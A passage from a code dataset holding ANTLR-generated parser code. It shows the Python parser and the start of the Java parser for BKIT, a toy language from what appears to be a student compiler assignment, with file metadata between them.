RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return 
localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 36\n self.primitive_type()\n self.state = 37\n self.ids_list()\n self.state = 38\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,i)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return 
self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 40\n self.primitive_type()\n self.state = 41\n self.match(BKITParser.ID)\n self.state = 42\n self.match(BKITParser.LEFT_PAREN)\n self.state = 43\n self.primitive_type()\n self.state = 44\n self.ids_list()\n self.state = 51\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.SEMI:\n self.state = 45\n self.match(BKITParser.SEMI)\n self.state = 46\n self.primitive_type()\n self.state = 47\n self.ids_list()\n self.state = 53\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 54\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 55\n self.match(BKITParser.LEFT_BRACE)\n self.state = 56\n self.function_body()\n self.state = 57\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return 
self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 63\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT))) != 0):\n self.state = 61\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 59\n self.var_declare()\n pass\n elif token in [BKITParser.ID, BKITParser.RETURN]:\n self.state = 60\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 65\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 69\n self._errHandler.sync(self)\n la_ = 
self._interp.adaptivePredict(self._input,5,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 66\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 67\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 68\n self.ret_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 71\n self.match(BKITParser.ID)\n self.state = 72\n self.match(BKITParser.ASSIGN)\n self.state = 73\n self.expr()\n self.state = 74\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n 
return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 76\n self.match(BKITParser.ID)\n self.state = 77\n self.match(BKITParser.LEFT_PAREN)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ID:\n self.state = 78\n self.ids_list()\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 84\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 85\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 87\n self.match(BKITParser.RETURN)\n self.state = 88\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_expr)\n try:\n self.state = 95\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 90\n self.expr1(0)\n self.state = 91\n self.match(BKITParser.PLUS_INT)\n self.state = 92\n self.expr()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 94\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, 
_parentState)\n _prevctx = localctx\n _startState = 18\n self.enterRecursionRule(localctx, 18, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 103\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,8,self._ctx)\n if la_ == 1:\n self.state = 98\n self.expr2(0)\n self.state = 99\n self.match(BKITParser.MINUS_INT)\n self.state = 100\n self.expr1(3)\n pass\n\n elif la_ == 2:\n self.state = 102\n self.expr2(0)\n pass\n\n\n self._ctx.stop = self._input.LT(-1)\n self.state = 110\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 105\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 106\n self.match(BKITParser.STAR_INT)\n self.state = 107\n self.expr2(0) \n self.state = 112\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr2Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr2Context,i)\n\n\n def 
DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 20\n self.enterRecursionRule(localctx, 20, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 114\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 121\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 116\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n\n self.state = 117\n self.match(BKITParser.DIV_INT)\n self.state = 118\n self.expr2(3) \n self.state = 123\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return 
self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_operand)\n try:\n self.state = 128\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 124\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 125\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 126\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 127\n self.call_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 130\n self.match(BKITParser.ID)\n self.state = 135\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 131\n self.match(BKITParser.COMMA)\n self.state = 132\n 
self.match(BKITParser.ID)\n self.state = 137\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 138\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[9] = self.expr1_sempred\n self._predicates[10] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { 
"alpha_fraction": 0.6329759955406189, "alphanum_fraction": 0.6747320294380188, "avg_line_length": 26.439775466918945, "blob_id": "dd51d1cdd0168ac676e6dbc9469413f8481e7b2c", "content_id": "ce79dd67c8b7c5d787aef86781ec4474fca75e1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9795, "license_type": "no_license", "max_line_length": 114, "num_lines": 357, "path": "/AST/assignment2/src/main/bkit/parser/.antlr/BKITParser.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from /home/nguyendat/Documents/projects/PPL/AST/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.misc.*;\nimport org.antlr.v4.runtime.tree.*;\nimport java.util.List;\nimport java.util.Iterator;\nimport java.util.ArrayList;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITParser extends Parser {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tT__0=1, T__1=2, INTTYPE=3, FLOATTYPE=4, ID=5;\n\tpublic static final int\n\t\tRULE_program = 0, RULE_vardecls = 1, RULE_vardecltail = 2, RULE_vardecl = 3, \n\t\tRULE_mptype = 4, RULE_ids = 5;\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"program\", \"vardecls\", \"vardecltail\", \"vardecl\", \"mptype\", \"ids\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"';'\", \"','\", \"'int'\", \"'float'\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] 
makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, \"INTTYPE\", \"FLOATTYPE\", \"ID\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic BKITParser(TokenStream input) {\n\t\tsuper(input);\n\t\t_interp = new ParserATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\tpublic static class ProgramContext extends ParserRuleContext {\n\t\tpublic VardeclsContext vardecls() {\n\t\t\treturn getRuleContext(VardeclsContext.class,0);\n\t\t}\n\t\tpublic TerminalNode EOF() { return getToken(BKITParser.EOF, 0); }\n\t\tpublic ProgramContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_program; }\n\t}\n\n\tpublic final ProgramContext program() throws RecognitionException {\n\t\tProgramContext _localctx = new ProgramContext(_ctx, 
getState());\n\t\tenterRule(_localctx, 0, RULE_program);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(12);\n\t\t\tvardecls();\n\t\t\tsetState(13);\n\t\t\tmatch(EOF);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardeclsContext extends ParserRuleContext {\n\t\tpublic VardeclContext vardecl() {\n\t\t\treturn getRuleContext(VardeclContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext vardecltail() {\n\t\t\treturn getRuleContext(VardecltailContext.class,0);\n\t\t}\n\t\tpublic VardeclsContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecls; }\n\t}\n\n\tpublic final VardeclsContext vardecls() throws RecognitionException {\n\t\tVardeclsContext _localctx = new VardeclsContext(_ctx, getState());\n\t\tenterRule(_localctx, 2, RULE_vardecls);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(15);\n\t\t\tvardecl();\n\t\t\tsetState(16);\n\t\t\tvardecltail();\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardecltailContext extends ParserRuleContext {\n\t\tpublic VardeclContext vardecl() {\n\t\t\treturn getRuleContext(VardeclContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext vardecltail() {\n\t\t\treturn getRuleContext(VardecltailContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecltail; }\n\t}\n\n\tpublic final 
VardecltailContext vardecltail() throws RecognitionException {\n\t\tVardecltailContext _localctx = new VardecltailContext(_ctx, getState());\n\t\tenterRule(_localctx, 4, RULE_vardecltail);\n\t\ttry {\n\t\t\tsetState(22);\n\t\t\t_errHandler.sync(this);\n\t\t\tswitch (_input.LA(1)) {\n\t\t\tcase INTTYPE:\n\t\t\tcase FLOATTYPE:\n\t\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t\t{\n\t\t\t\tsetState(18);\n\t\t\t\tvardecl();\n\t\t\t\tsetState(19);\n\t\t\t\tvardecltail();\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase EOF:\n\t\t\t\tenterOuterAlt(_localctx, 2);\n\t\t\t\t{\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tthrow new NoViableAltException(this);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardeclContext extends ParserRuleContext {\n\t\tpublic MptypeContext mptype() {\n\t\t\treturn getRuleContext(MptypeContext.class,0);\n\t\t}\n\t\tpublic IdsContext ids() {\n\t\t\treturn getRuleContext(IdsContext.class,0);\n\t\t}\n\t\tpublic VardeclContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecl; }\n\t}\n\n\tpublic final VardeclContext vardecl() throws RecognitionException {\n\t\tVardeclContext _localctx = new VardeclContext(_ctx, getState());\n\t\tenterRule(_localctx, 6, RULE_vardecl);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(24);\n\t\t\tmptype();\n\t\t\tsetState(25);\n\t\t\tids();\n\t\t\tsetState(26);\n\t\t\tmatch(T__0);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class MptypeContext extends 
ParserRuleContext {\n\t\tpublic TerminalNode INTTYPE() { return getToken(BKITParser.INTTYPE, 0); }\n\t\tpublic TerminalNode FLOATTYPE() { return getToken(BKITParser.FLOATTYPE, 0); }\n\t\tpublic MptypeContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_mptype; }\n\t}\n\n\tpublic final MptypeContext mptype() throws RecognitionException {\n\t\tMptypeContext _localctx = new MptypeContext(_ctx, getState());\n\t\tenterRule(_localctx, 8, RULE_mptype);\n\t\tint _la;\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(28);\n\t\t\t_la = _input.LA(1);\n\t\t\tif ( !(_la==INTTYPE || _la==FLOATTYPE) ) {\n\t\t\t_errHandler.recoverInline(this);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif ( _input.LA(1)==Token.EOF ) matchedEOF = true;\n\t\t\t\t_errHandler.reportMatch(this);\n\t\t\t\tconsume();\n\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class IdsContext extends ParserRuleContext {\n\t\tpublic TerminalNode ID() { return getToken(BKITParser.ID, 0); }\n\t\tpublic IdsContext ids() {\n\t\t\treturn 